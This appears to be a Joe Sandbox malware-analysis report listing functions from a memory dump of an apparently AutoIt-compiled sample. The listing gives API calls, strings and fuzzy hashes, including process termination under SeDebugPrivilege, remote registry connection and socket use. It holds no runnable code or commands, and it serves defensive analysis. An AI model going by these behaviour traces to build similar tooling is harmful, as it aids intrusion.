Null Object assignment in FOR..IN loop, xrefs: 00F498B2, 00F499E0, 00F49A98

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 82442b50972e0e8463886f947dd48604abd205a6e5d2ad4e5cd490fb52a86493
Instruction ID: 3b2b979d0b41af34df1361a51a62648e6fb75e9d5039314058c0e8bced296a8c
Opcode Fuzzy Hash: 82442b50972e0e8463886f947dd48604abd205a6e5d2ad4e5cd490fb52a86493
Instruction Fuzzy Hash: B7919C71E04219ABDF24CFA5C844FAFBBB8EF85720F10855DF915AB280D7B49900DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F49E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00F27D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?,?,00F28073), ref: 00F27D45
Part of subcall function 00F27D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D60
Part of subcall function 00F27D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D6E
Part of subcall function 00F27D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?), ref: 00F27D7E

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F49EF0
_memset.LIBCMT ref: 00F49EFD
_memset.LIBCMT ref: 00F4A040
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F4A06C
CoTaskMemFree.OLE32(?), ref: 00F4A077

Strings

NULL Pointer assignment, xrefs: 00F4A0C5

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 37cb148d949e86bb51b5021a6986fc168268cdc003500e87e82df4a00eefbd67
Instruction ID: 86e13160d0d620df29faddd684b0b120167c475a66203bdbbd9809ed799c4a4a
Opcode Fuzzy Hash: 37cb148d949e86bb51b5021a6986fc168268cdc003500e87e82df4a00eefbd67
Instruction Fuzzy Hash: 7B912771D0022DABDB20DFA5DC41EDEBBB9EF08310F20415AF915A7291EB719A44DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F573A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F57449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00F5745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F57477
_wcscat.LIBCMT ref: 00F574D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00F574E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F57517

Strings

SysListView32, xrefs: 00F5741B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 61ec5c525da21ef966eeee38eaedfd83e9d5f80a4a3da2794b0dd163f0b52b80
Instruction ID: 877db06e7c05c015bd7278f98811d44c97d7cf80ac605f84d5b83bb2a818d8b4
Opcode Fuzzy Hash: 61ec5c525da21ef966eeee38eaedfd83e9d5f80a4a3da2794b0dd163f0b52b80
Instruction Fuzzy Hash: C941A471904348AFDB21EF64DC85FEE77A8EF08361F10442AFA45A7291D7719D88EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F4F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00F34148: CreateToolhelp32Snapshot.KERNEL32 ref: 00F3416D
Part of subcall function 00F34148: Process32FirstW.KERNEL32(00000000,?), ref: 00F3417B
Part of subcall function 00F34148: CloseHandle.KERNEL32(00000000), ref: 00F34245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4F08D
GetLastError.KERNEL32 ref: 00F4F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00F4F14C
GetLastError.KERNEL32(00000000), ref: 00F4F157
CloseHandle.KERNEL32(00000000), ref: 00F4F18C

Strings

SeDebugPrivilege, xrefs: 00F4F0AB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 8b5b645b31be87de96e551e045aebfee9f969007ca22d854b49459d673b159ef
Instruction ID: 0c2c1fec61832a97f6b7d73219269b5dcf142ba7f3b9c31baf00c6065a58eecd
Opcode Fuzzy Hash: 8b5b645b31be87de96e551e045aebfee9f969007ca22d854b49459d673b159ef
Instruction Fuzzy Hash: 2341F0712002009FDB15EF24CC95F6EBBE5AF84324F148419F8069B3C2CBB9A809EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00F334DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00F3357C

Strings

warning, xrefs: 00F33565
question, xrefs: 00F33535
stop, xrefs: 00F3354D
info, xrefs: 00F3351D
blank, xrefs: 00F334FE

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 760a1ee799672b13c1708a8c63807b75f5dc2039ecaf5abd0017fa403ca8ba05
Instruction ID: 853c234892dd2c45914ae468a1245916a782f5f431eb085eba22f5e7dd94db83
Opcode Fuzzy Hash: 760a1ee799672b13c1708a8c63807b75f5dc2039ecaf5abd0017fa403ca8ba05
Instruction Fuzzy Hash: 8E110832A0930BBEA7519A24DC92DAA77DCDF05370F24001AF6006A181E7A4AF4076B1

Uniqueness

Uniqueness Score: -1.00%

Function 00F347E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F34802
LoadStringW.USER32(00000000), ref: 00F34809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F3481F
LoadStringW.USER32(00000000), ref: 00F34826
_wprintf.LIBCMT ref: 00F3484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F3486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F34847

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 716122ed46f6ac44a1307fe471159d020575ef0fa8c4fba9c85d1688c0496f96
Instruction ID: 22e682408277d7adfad0a8e40578787288143bb3ffcfc53022c696cf8409cfda
Opcode Fuzzy Hash: 716122ed46f6ac44a1307fe471159d020575ef0fa8c4fba9c85d1688c0496f96
Instruction Fuzzy Hash: 92012CF294020C7BE711ABA0DE89EF7766CEB09300F500596F759E2041EAB4AE845B75

Uniqueness

Uniqueness Score: -1.00%

Function 00F5DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

GetSystemMetrics.USER32 ref: 00F5DB42
GetSystemMetrics.USER32 ref: 00F5DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F5DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F5DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F5DDDC
ShowWindow.USER32(00000003,00000000), ref: 00F5DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00F5DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00F5DE43

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: d428787279430e1697316b450e08773ff5c058180d65dda4d40186232d0ddc0c
Instruction ID: 7e57aaa3afc2881dd36696d1a354928ca05675a3358698be473a48c9830b2a5f
Opcode Fuzzy Hash: d428787279430e1697316b450e08773ff5c058180d65dda4d40186232d0ddc0c
Instruction Fuzzy Hash: 46B1CF31901219EFCF24CF68C9C97AE7BB1FF04712F088069EE489E255D770A954EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F50371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F5044E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: a5a2efddc27048dbd847110811ecb57ab1d02e93fbee9d7acc32db29dd473ec8
Instruction ID: 0178dd753bc6aeaf26082e506bc7330af1522600c130766a98b0dba48147d0c1
Opcode Fuzzy Hash: a5a2efddc27048dbd847110811ecb57ab1d02e93fbee9d7acc32db29dd473ec8
Instruction Fuzzy Hash: DAA19C712042059FCB10EF24C881F2EBBE5EF84315F14891DFA96972A2DB75E949EF42

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000), ref: 00ED2E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000,000000FF), ref: 00ED2EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000), ref: 00F0C55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000), ref: 00F0C5C7

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: b458db30c13b4d06c8d53691a1f88946bbec29601f5d91d2e917f16b0edf5813
Instruction ID: ea7bc39b59699c9ff8b11e446f2ea1930ca034516dddd4b348ee799e273e91bf
Opcode Fuzzy Hash: b458db30c13b4d06c8d53691a1f88946bbec29601f5d91d2e917f16b0edf5813
Instruction Fuzzy Hash: EE412C306047849AC7374728CC8877B7B91EBA1314F28690FEE47627A1CB72B842F750

Uniqueness

Uniqueness Score: -1.00%

Function 00F37681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00F37698

Part of subcall function 00EF0FE6: std::exception::exception.LIBCMT ref: 00EF101C
Part of subcall function 00EF0FE6: __CxxThrowException@8.LIBCMT ref: 00EF1031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F376CF
EnterCriticalSection.KERNEL32(?), ref: 00F376EB
_memmove.LIBCMT ref: 00F37739
_memmove.LIBCMT ref: 00F37756
LeaveCriticalSection.KERNEL32(?), ref: 00F37765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F3777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00F37799

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 059d8f44ed6c749066ac2996f1f3e606583867720c2aafcd8285ffb26db969c2
Instruction ID: fcf4c6231f2290ea30ef0098c53e2990421296f97502944555c595feed2c56d4
Opcode Fuzzy Hash: 059d8f44ed6c749066ac2996f1f3e606583867720c2aafcd8285ffb26db969c2
Instruction Fuzzy Hash: 76318172904209EBCB10EF54DC85EBFB7B8EF45710F2440A5F904AB256DB709E50EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F567F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F56810
GetDC.USER32(00000000), ref: 00F56818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F56823
ReleaseDC.USER32 ref: 00F5682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F5686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F5687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F5964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00F568B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F568D6

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 527284c1f22bef584ceed292494a0ec7a0fe698bd2d7a758cf9e10811ed74f35
Instruction ID: e2133bbfc96fb970ed523486d66b8127f91b1cd6dbe08d60c6d6cbe4190c39c6
Opcode Fuzzy Hash: 527284c1f22bef584ceed292494a0ec7a0fe698bd2d7a758cf9e10811ed74f35
Instruction Fuzzy Hash: 46316D721012147FEB118F10CC4AFAB3BA9EF49762F044065FE18DA291CAB59851DB74

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00F2C75D
_memcmp.LIBCMT ref: 00F2C77F
_memcmp.LIBCMT ref: 00F2C797
_memcmp.LIBCMT ref: 00F2C7AA
_memcmp.LIBCMT ref: 00F2C7C4
_memcmp.LIBCMT ref: 00F2C7D7
_memcmp.LIBCMT ref: 00F2C7EF
_memcmp.LIBCMT ref: 00F2C80A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: ddd92b99dc6e6f1690406f3fca74eb4fce1041440aaf39c197d8f12a6a6cecfa
Instruction ID: 6a00d4e2656b7998b0447a0706f53930b501215780b9df7fc31728ddc7175e26
Opcode Fuzzy Hash: ddd92b99dc6e6f1690406f3fca74eb4fce1041440aaf39c197d8f12a6a6cecfa
Instruction Fuzzy Hash: E821A772F0162DBAD604B521AD42FBF37AC9E25754B184024FE06B6342E710DE11E6E2

Uniqueness

Uniqueness Score: -1.00%

Function 00F3F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D

_wcstok.LIBCMT ref: 00F3F2D7
_wcscpy.LIBCMT ref: 00F3F366
_memset.LIBCMT ref: 00F3F399

Strings

X, xrefs: 00F3F3D6

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: a174f6ab12c22a794a75e4fd0568686a38aa8f1409703b9d032ef17421a808d4
Instruction ID: 2b1420914ee98202af42a346d4c1436c47a16634dfb905af6e71b9fcfd267e33
Opcode Fuzzy Hash: a174f6ab12c22a794a75e4fd0568686a38aa8f1409703b9d032ef17421a808d4
Instruction Fuzzy Hash: BCC17B71A047459FC714EF24C881A6AB7E4EF84360F14596DF899A72A2DB30EC49DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00F471EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F472EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F4730C
WSAGetLastError.WSOCK32(00000000), ref: 00F4731F
htons.WSOCK32(?,?,?,00000000,?), ref: 00F473D5
inet_ntoa.WSOCK32(?), ref: 00F47392

Part of subcall function 00F2B4EA: _strlen.LIBCMT ref: 00F2B4F4
Part of subcall function 00F2B4EA: _memmove.LIBCMT ref: 00F2B516

_strlen.LIBCMT ref: 00F4742F
_memmove.LIBCMT ref: 00F47498

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: a73c14b5bf21e0a6665cad5be5747f29140b0077b5692abfbbc6e3fd9cea924b
Instruction ID: f723f34d9b8f45e017685f5a061fd0fa5c37d579d3ec4e1a71f540e7fac42f05
Opcode Fuzzy Hash: a73c14b5bf21e0a6665cad5be5747f29140b0077b5692abfbbc6e3fd9cea924b
Instruction Fuzzy Hash: 1781CE72508300ABC310EB24DC85E6BBBE8EF94724F105A1DF955AB2E2EB70DD41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71f3df143bde3ffc1202e55d1c34d7ec0ef266576744621537fa8eb14c7ffbb5
Instruction ID: 6f19f66235679b879998e6d375ebd034d288fe2c5afbb23ade4a3043b76ec4a9
Opcode Fuzzy Hash: 71f3df143bde3ffc1202e55d1c34d7ec0ef266576744621537fa8eb14c7ffbb5
Instruction Fuzzy Hash: CC713E74A00109FFDB08DF58CC45EAEBBB5FF86314F14819AF915AB251C7349A52EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F5B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(012786F8), ref: 00F5BA5D
IsWindowEnabled.USER32(012786F8), ref: 00F5BA69
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F5BB4D
SendMessageW.USER32(012786F8,000000B0,?,?), ref: 00F5BB84
IsDlgButtonChecked.USER32(?,?), ref: 00F5BBC1
GetWindowLongW.USER32(012786F8,000000EC), ref: 00F5BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F5BBFB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
